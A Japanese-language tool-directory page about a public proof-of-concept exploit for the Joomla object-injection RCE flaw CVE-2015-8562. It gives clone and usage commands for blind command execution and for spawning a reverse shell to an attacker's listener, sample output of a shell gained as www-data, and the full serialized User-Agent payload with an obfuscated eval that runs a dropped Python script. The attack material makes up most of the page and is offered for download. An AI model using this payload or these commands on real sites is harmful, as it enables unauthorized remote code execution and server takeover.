Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Joomla_CVE-2015-8562 — JoomlaのCVE-2015-8562脆弱性(オブジェクトインジェクションRCE)に対する概念実証 | Kitploit
ツール/GitHubGitHub/voidsec/joomla_cve-2015-8562
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubvoidsec/joomla_cve-2015-8562

Joomla_CVE-2015-8562

JoomlaのCVE-2015-8562脆弱性(オブジェクトインジェクションRCE)に対する概念実証

リポジトリを見る
1186年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

Joomla_CVE-2015-8562

JoomlaのCVE-2015-8562脆弱性(オブジェクトインジェクションRCE)の概念実証

イントロ/変更履歴

このPoCは、exploit-dbで公開されている実装の第2バージョンです。

root@kitploit:~
-修正: (セッションの再生成)
-X-Forwarded-ForからUser-Agentメソッドへの切り替えオプションを追加
-Pythonリバースシェルからbashへの切り替えオプションを追加
-欠落したhttpスキーマとスクリプト終了の例外キャッチを追加
-使いやすさ、メッセージと色の改善のために編集
-TODO: msfサポートの追加

使用方法

root@kitploit:~
git clone https://github.com/VoidSec/Joomla_CVE-2015-8562.git
cd Joomla_CVE-2015-8562

Blind RCE:

root@kitploit:~
python joomla-cve-2015-8562.py -t http://<target_ip>/ --cmd
$ touch /tmp/test

Spawn Reverse Shell:

root@kitploit:~
python joomla-cve-2015-8562.py -t http://<target_ip>/ -l <local_ip> -p <local_port>
[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://<target_ip>/
[-] Uploading python reverse shell
<Response [200]>
[+] Spawning reverse shell....
<Response [200]>
Listening on [0.0.0.0] (family 0, port 1337)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

CVE-2015-8562

2015年12月、Joomlaに新たな脆弱性が発見されました。これは、リモートの攻撃者がHTTPのUser-Agentヘッダーを介してPHPオブジェクトインジェクション攻撃を悪用し、任意のPHPコードを実行することを可能にします。

この脆弱性は、Joomla 1.5.0から3.4.5、およびPHPバージョン5.4.45未満(5.3.xを含む)、5.5.29または5.6.13を対象としています CVE-2015-6835。

脆弱性の説明を記載したブログ記事を作成しました。

送信されたヘッダーは以下のようになります

root@kitploit:~
}__test|O:21:"JDatabaseDriverMysqli":3:{
	s:2:"fc";
	O:17:"JSimplepieFactory":0:{}
	s:21:"\0\0\0disconnectHandlers";
	a:1:{
		i:0;
		a:2:{
			i:0;
			O:9:"SimplePie":5:{
				s:8:"sanitize";
				O:20:"JDatabaseDriverMysql":0:{}
				s:8:"feed_url";
				s:305:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(112).chr(121).chr(116).chr(104).chr(111).chr(110).chr(32).chr(47).chr(116).chr(109).chr(112).chr(47).chr(76).chr(56).chr(51).chr(55).chr(66).chr(72).chr(46).chr(112).chr(121).chr(39).chr(41).chr(59));
				JFactory::getConfig();
				exit";
				s:19:"cache_name_function";
				s:6:"assert";
				s:5:"cache";
				b:1;s:11:"cache_class";
				O:20:"JDatabaseDriverMysql":0:{}
				}
			i:1;
			s:4:"init";
			}
		}
	s:13:"\0\0\0connection";
	b:1;
}ýýýý
ツールをダウンロード